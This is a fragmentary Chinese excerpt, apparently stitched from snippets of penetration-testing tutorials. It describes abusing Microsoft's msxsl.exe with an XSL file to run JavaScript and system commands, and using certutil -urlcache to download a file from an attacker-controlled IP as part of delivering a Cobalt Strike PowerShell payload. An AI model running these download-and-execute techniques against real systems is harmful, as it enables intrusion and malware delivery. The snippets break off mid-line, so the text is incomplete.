1.需要用到微软工具MSXSL.exe,msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令,其下载地址为: https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714 2.执行该工具需要用到2个文件,分别为XML及XSL文件,其命令如下: msxsl.exe test.xml exec.xsl...
下载地址: https://www.microsoft.com/en-us/download/details.aspx?id=21714 执行如下图 参考Casey Smith的POC: customers.xml: <?xml version="1.0"?> <?xml-stylesheet type="text/xsl"href="script.xsl"?> <customers> <customer> <name>John Smith</name> 123 Elm St. <phone>(123) 456-7890</...
缓存目录位置:%USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent certutil -urlcache -f http://192.168.50.146:80/download/file.txt 配合powershell利用; cobalt strike生成一个ps1的恶意脚本并放在我们的payload下发服务器中 PSC:\Users\(123223Li)>certutil-urlcache-split-fhttp://192.168.50.146:80/do...